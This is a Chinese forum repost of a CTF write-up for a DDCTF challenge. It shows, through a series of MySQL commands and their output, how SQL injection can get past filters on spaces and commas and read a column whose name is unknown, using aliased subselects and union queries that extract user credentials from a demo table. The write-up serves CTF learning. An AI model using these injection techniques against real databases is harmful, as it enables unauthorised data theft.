• 售前

  • 售后

热门帖子
入门百科

Mysql如何奇妙的绕过未知字段名详解

[复制链接]
话筒他常te 显示全部楼层 发表于 2021-10-25 19:14:05 |阅读模式 打印 上一主题 下一主题
媒介
本文介绍的是DDCTF第五题,绕过未知字段名的本领,这里拿本机来操纵了下,思路很棒也很清晰,分享给各人,下面来看看具体的介绍:
实现思路
标题过滤空格和逗号,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括号都可以绕过,逗号使用join绕过;
存放flag的字段名未知,information_schema.columns也将表名的hex过滤了,即获取不到字段名;这时可以利用团结查询,过程如下:
思想就是获取flag,让其在已知字段名下出现;
示例代码:
  1. mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
  2. +---+---+---+---+
  3. | a | b | c | d |
  4. +---+---+---+---+
  5. | 1 | 2 | 3 | 4 |
  6. +---+---+---+---+
  7. 1 row in set (0.00 sec)
  8. mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
  9. +---+---+---+---+
  10. | 1 | 2 | 3 | 4 |
  11. +---+---+---+---+
  12. | 1 | 2 | 3 | 4 |
  13. +---+---+---+---+
  14. 1 row in set (0.00 sec)
  15. mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
  16. +---+-------+----------+-------------+
  17. | 1 | 2  | 3  | 4   |
  18. +---+-------+----------+-------------+
  19. | 1 | 2  | 3  | 4   |
  20. | 1 | admin | admin888 | 110@110.com |
  21. | 2 | test | test123 | 119@119.com |
  22. | 3 | cs | cs123 | 120@120.com |
  23. +---+-------+----------+-------------+
  24. 4 rows in set (0.01 sec)
  25. mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
  26. +-------------+
  27. | 4   |
  28. +-------------+
  29. | 4   |
  30. | 110@110.com |
  31. | 119@119.com |
  32. | 120@120.com |
  33. +-------------+
  34. 4 rows in set (0.03 sec)
  35. mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
  36. +-------------+
  37. | 4   |
  38. +-------------+
  39. | 120@120.com |
  40. +-------------+
  41. 1 row in set (0.01 sec)
  42. mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
  43. union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
  44. +-------------+----------+----------+-------------+
  45. | id   | username | password | email  |
  46. +-------------+----------+----------+-------------+
  47. | 1   | admin | admin888 | 110@110.com |
  48. | 120@120.com | 1  | 1  | 1   |
  49. +-------------+----------+----------+-------------+
  50. 2 rows in set (0.04 sec)
复制代码
总结
以上就是这篇文章的全部内容了,希望本文的内容对各人的学习或者工作能带来肯定的帮助,假如有疑问各人可以留言互换,谢谢各人对草根技术分享的支持。

帖子地址: 

回复

使用道具 举报

分享
推广
火星云矿 | 预约S19Pro,享500抵1000!
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

草根技术分享(草根吧)是全球知名中文IT技术交流平台,创建于2021年,包含原创博客、精品问答、职业培训、技术社区、资源下载等产品服务,提供原创、优质、完整内容的专业IT技术开发社区。
  • 官方手机版

  • 微信公众号

  • 商务合作